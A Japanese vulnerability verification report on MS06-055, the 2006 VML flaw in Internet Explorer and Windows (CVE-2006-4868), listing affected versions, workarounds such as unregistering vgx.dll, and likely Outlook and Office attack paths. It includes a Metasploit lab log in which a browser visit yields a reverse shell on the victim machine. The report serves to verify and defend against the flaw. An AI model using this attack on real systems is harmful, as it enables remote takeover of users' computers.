MS06-055:Vector Markup Language の脆弱性により、リモートでコードが実行される

• 2006/09/26　初版
  • Author grin

• マイクロソフト社の複数の製品に実装されているVML処理の脆弱性
• 2006年9月26日現在修正プログラムのリリースはなし
  • 2006年9月27日に修正プログラムが公開された
• この脆弱性を利用した攻撃の報告あり

• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 with SP1 for Itanium-based Systems Edition
• Microsoft Windows Server 2003 x64 Edition

• Microsoft::マイクロソフト セキュリティ アドバイザリ (MS06-055)
• CVE-2006-4868

• Metasploit Framework にて検証

• Windows XP SP2(フルパッチ)日本語版

• 攻撃先IPアドレス: 192.168.0.100
• 攻撃元IPアドレス: 192.168.0.10
• 攻撃先PCのIEで攻撃元PCの80番ポートへアクセスする受動的攻撃にてリバースコネクトを行う

[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.10:80/
[*] Client connected from 192.168.0.100:1138...
[*] Got connection from 192.168.0.10:4321 <-> 192.168.0.100:1140

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\デスクトップ>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.0.100
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1

2006年9月26日現在、修正プログラムがリリースされていないので 以下は暫定的処置

1. Vgx.dllをレジストリから削除
2. アクセスコントロールリスト（ACL）の編集によるVgx.dllへのアクセス制御
3. IEのセキュリティ設定でインターネット/イントラネットゾーンでバイナリ、スクリプト実行の無効
4. メールのテキスト表示

今回の検証にはIEを使用したがIEのみの脆弱性ではなく Vgx.dllを使用しているマイクロソフト社の複数の製品が影響を受ける。 よって、Outlookによるメール受信、Officeを使用した攻撃方法も想定される。